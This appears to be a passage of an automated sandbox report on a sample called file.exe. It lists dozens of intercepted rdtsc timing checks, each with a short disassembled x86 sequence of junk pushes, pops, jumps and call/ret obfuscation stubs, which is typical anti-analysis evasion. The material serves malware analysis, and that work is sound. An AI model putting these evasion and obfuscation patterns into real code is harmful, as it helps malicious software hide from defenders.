              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 122B8F8 second address: 122B93C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD7F8BAA15Fh 0x00000007 push edx 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FD7F8BAA165h 0x00000014 jmp 00007FD7F8BAA166h 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 122AD74 second address: 122AD7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11EBFF8 second address: 11EC019 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD7F8BAA167h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 122B089 second address: 122B09C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 jmp 00007FD7F8DB51EDh 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 122B1A7 second address: 122B1AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 122B1AB second address: 122B1D3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD7F8DB51F6h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jns 00007FD7F8DB51ECh 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 122BFD1 second address: 122BFF8 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007FD7F8BAA166h 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jc 00007FD7F8BAA158h 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 122BFF8 second address: 122BFFD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 122C5AE second address: 122C5B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007FD7F8BAA156h 0x0000000a popad 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 122C5B9 second address: 122C5BF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 122CFB0 second address: 122CFB4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 122CFB4 second address: 122CFD2 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FD7F8DB51E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FD7F8DB51F0h 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 122D136 second address: 122D13D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 122D13D second address: 122D143 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 122D143 second address: 122D147 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 122E084 second address: 122E090 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 push eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 122DEFD second address: 122DF05 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 122E090 second address: 122E094 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 122FD26 second address: 122FD3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD7F8BAA161h 0x00000009 popad 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 122FD3C second address: 122FD53 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FD7F8DB51E8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jnc 00007FD7F8DB51E6h 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 122FD53 second address: 122FD59 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 122FD59 second address: 122FD71 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FD7F8DB51F3h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12307DE second address: 12307E4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12307E4 second address: 1230890 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FD7F8DB51F5h 0x00000008 jmp 00007FD7F8DB51EFh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f mov dword ptr [esp], eax 0x00000012 push 00000000h 0x00000014 push eax 0x00000015 call 00007FD7F8DB51E8h 0x0000001a pop eax 0x0000001b mov dword ptr [esp+04h], eax 0x0000001f add dword ptr [esp+04h], 0000001Dh 0x00000027 inc eax 0x00000028 push eax 0x00000029 ret 0x0000002a pop eax 0x0000002b ret 0x0000002c add dword ptr [ebp+122D339Fh], esi 0x00000032 push 00000000h 0x00000034 push 00000000h 0x00000036 push ebp 0x00000037 call 00007FD7F8DB51E8h 0x0000003c pop ebp 0x0000003d mov dword ptr [esp+04h], ebp 0x00000041 add dword ptr [esp+04h], 00000017h 0x00000049 inc ebp 0x0000004a push ebp 0x0000004b ret 0x0000004c pop ebp 0x0000004d ret 0x0000004e push 00000000h 0x00000050 push 00000000h 0x00000052 push ecx 0x00000053 call 00007FD7F8DB51E8h 0x00000058 pop ecx 0x00000059 mov dword ptr [esp+04h], ecx 0x0000005d add dword ptr [esp+04h], 0000001Ah 0x00000065 inc ecx 0x00000066 push ecx 0x00000067 ret 0x00000068 pop ecx 0x00000069 ret 0x0000006a or dword ptr [ebp+122D2AE2h], edx 0x00000070 sbb di, 4680h 0x00000075 xchg eax, ebx 0x00000076 push eax 0x00000077 push edx 0x00000078 jmp 00007FD7F8DB51F2h 0x0000007d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12305EC second address: 12305F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1238D21 second address: 1238D2B instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1238D2B second address: 1238D2F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 123CCD2 second address: 123CCD6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 123E2A4 second address: 123E2B8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FD7F8BAA15Ah 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 123E2B8 second address: 123E300 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 sbb di, 222Fh 0x0000000e push 00000000h 0x00000010 push 00000000h 0x00000012 push edx 0x00000013 call 00007FD7F8DB51E8h 0x00000018 pop edx 0x00000019 mov dword ptr [esp+04h], edx 0x0000001d add dword ptr [esp+04h], 0000001Ch 0x00000025 inc edx 0x00000026 push edx 0x00000027 ret 0x00000028 pop edx 0x00000029 ret 0x0000002a mov ebx, dword ptr [ebp+122D34B1h] 0x00000030 push 00000000h 0x00000032 mov edi, dword ptr [ebp+122D361Dh] 0x00000038 xchg eax, esi 0x00000039 pushad 0x0000003a push eax 0x0000003b push edx 0x0000003c push eax 0x0000003d pop eax 0x0000003e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 123E300 second address: 123E30E instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FD7F8BAA156h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 123E30E second address: 123E31F instructions: 0x00000000 rdtsc 0x00000002 jc 00007FD7F8DB51E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 123E31F second address: 123E32A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FD7F8BAA156h 0x0000000a popad 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 123E32A second address: 123E32F instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1237D47 second address: 1237D59 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c je 00007FD7F8BAA156h 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1238E5B second address: 1238E83 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FD7F8DB51ECh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c jne 00007FD7F8DB51E8h 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007FD7F8DB51ECh 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 123E4BC second address: 123E4C0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 123E59F second address: 123E5AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push edi 0x0000000a push edi 0x0000000b pop edi 0x0000000c pop edi 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1238F42 second address: 1238F48 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1238F48 second address: 1238F4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1245168 second address: 124516E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 124516E second address: 124517D instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1240374 second address: 124037A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1241471 second address: 1241475 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 124517D second address: 12451D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 jnc 00007FD7F8BAA156h 0x0000000e popad 0x0000000f popad 0x00000010 nop 0x00000011 mov dword ptr [ebp+122D2797h], eax 0x00000017 push 00000000h 0x00000019 push 00000000h 0x0000001b push ebp 0x0000001c call 00007FD7F8BAA158h 0x00000021 pop ebp 0x00000022 mov dword ptr [esp+04h], ebp 0x00000026 add dword ptr [esp+04h], 0000001Bh 0x0000002e inc ebp 0x0000002f push ebp 0x00000030 ret 0x00000031 pop ebp 0x00000032 ret 0x00000033 mov dword ptr [ebp+122D2821h], edi 0x00000039 pushad 0x0000003a add esi, dword ptr [ebp+122D1B1Fh] 0x00000040 mov ax, dx 0x00000043 popad 0x00000044 push 00000000h 0x00000046 sbb di, BD66h 0x0000004b xchg eax, esi 0x0000004c push esi 0x0000004d push ecx 0x0000004e push eax 0x0000004f push edx 0x00000050 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1241475 second address: 1241496 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FD7F8DB51E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FD7F8DB51F5h 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11EDC18 second address: 11EDC2C instructions: 0x00000000 rdtsc 0x00000002 jc 00007FD7F8BAA156h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jno 00007FD7F8BAA158h 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11EDC2C second address: 11EDC31 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11EDC31 second address: 11EDC37 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 125193F second address: 1251943 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1251943 second address: 1251949 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1251949 second address: 125196D instructions: 0x00000000 rdtsc 0x00000002 jns 00007FD7F8DB51ECh 0x00000008 jl 00007FD7F8DB51E6h 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FD7F8DB51F2h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 125196D second address: 1251971 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1251971 second address: 1251975 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1251AD5 second address: 1251AD9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1251AD9 second address: 1251ADD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1251ADD second address: 1251AE3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1255EC1 second address: 1255EC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1255EC6 second address: 1255ECC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1255F97 second address: 1255FA8 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FD7F8DB51E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1255FA8 second address: 1255FDC instructions: 0x00000000 rdtsc 0x00000002 js 00007FD7F8BAA156h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ebx 0x0000000b jmp 00007FD7F8BAA167h 0x00000010 pop ebx 0x00000011 popad 0x00000012 mov eax, dword ptr [esp+04h] 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 pushad 0x0000001a popad 0x0000001b jl 00007FD7F8BAA156h 0x00000021 popad 0x00000022 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1255FDC second address: 125600D instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [eax] 0x0000000a pushad 0x0000000b jmp 00007FD7F8DB51ECh 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FD7F8DB51F8h 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 125B3FE second address: 125B404 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1260EA4 second address: 1260EA8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 125FDFE second address: 125FE05 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 125FE05 second address: 125FE18 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jc 00007FD7F8DB51E8h 0x0000000b pushad 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 push ecx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1233D37 second address: 1233DF5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edi 0x00000007 jmp 00007FD7F8BAA164h 0x0000000c pop edi 0x0000000d xchg eax, ebx 0x0000000e movzx ecx, cx 0x00000011 push dword ptr fs:[00000000h] 0x00000018 xor dx, D8C0h 0x0000001d pushad 0x0000001e mov dh, 4Fh 0x00000020 mov ax, cx 0x00000023 popad 0x00000024 mov dword ptr fs:[00000000h], esp 0x0000002b jnl 00007FD7F8BAA15Ch 0x00000031 mov dword ptr [ebp+12487918h], esp 0x00000037 push 00000000h 0x00000039 push eax 0x0000003a call 00007FD7F8BAA158h 0x0000003f pop eax 0x00000040 mov dword ptr [esp+04h], eax 0x00000044 add dword ptr [esp+04h], 0000001Ch 0x0000004c inc eax 0x0000004d push eax 0x0000004e ret 0x0000004f pop eax 0x00000050 ret 0x00000051 or edi, dword ptr [ebp+122D3621h] 0x00000057 mov dx, F5BDh 0x0000005b cmp dword ptr [ebp+122D3635h], 00000000h 0x00000062 jne 00007FD7F8BAA24Fh 0x00000068 clc 0x00000069 mov byte ptr [ebp+122D1AA6h], 00000047h 0x00000070 mov ecx, dword ptr [ebp+122D3609h] 0x00000076 mov eax, D49AA7D2h 0x0000007b or dword ptr [ebp+122D1BAAh], ebx 0x00000081 mov edx, ebx 0x00000083 nop 0x00000084 push eax 0x00000085 push edx 0x00000086 push eax 0x00000087 jmp 00007FD7F8BAA167h 0x0000008c pop eax 0x0000008d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1233DF5 second address: 1233DFB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1233DFB second address: 1233E21 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FD7F8BAA156h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FD7F8BAA167h 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1233E21 second address: 1233E27 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1233E27 second address: 1233E2B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1234126 second address: 1234130 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FD7F8DB51E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1234130 second address: 1234135 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12341B1 second address: 12341B6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12342A9 second address: 12342AE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1234315 second address: 123437C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD7F8DB51F8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 js 00007FD7F8DB51ECh 0x0000000f jc 00007FD7F8DB51E6h 0x00000015 popad 0x00000016 mov dword ptr [esp], esi 0x00000019 push 00000000h 0x0000001b push ebx 0x0000001c call 00007FD7F8DB51E8h 0x00000021 pop ebx 0x00000022 mov dword ptr [esp+04h], ebx 0x00000026 add dword ptr [esp+04h], 0000001Dh 0x0000002e inc ebx 0x0000002f push ebx 0x00000030 ret 0x00000031 pop ebx 0x00000032 ret 0x00000033 pushad 0x00000034 and edi, 1B27364Bh 0x0000003a mov dword ptr [ebp+122D22B3h], edi 0x00000040 popad 0x00000041 nop 0x00000042 push eax 0x00000043 push edx 0x00000044 pushad 0x00000045 push ebx 0x00000046 pop ebx 0x00000047 push eax 0x00000048 push edx 0x00000049 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 123437C second address: 1234381 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1234381 second address: 1234386 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1234386 second address: 12343AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD7F8BAA168h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12343AB second address: 12343AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12343AF second address: 12343BC instructions: 0x00000000 rdtsc 0x00000002 jp 00007FD7F8BAA156h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 123442E second address: 1234438 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FD7F8DB51E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1234438 second address: 123443E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1234983 second address: 1234987 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1234CBE second address: 1234CC8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push esi 0x00000009 pop esi 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1234DB4 second address: 1234DE3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD7F8DB51F3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a nop 0x0000000b movzx edi, ax 0x0000000e lea eax, dword ptr [ebp+12487904h] 0x00000014 mov ecx, dword ptr [ebp+122D2CAEh] 0x0000001a nop 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push ebx 0x0000001f pop ebx 0x00000020 pop eax 0x00000021 rdtsc
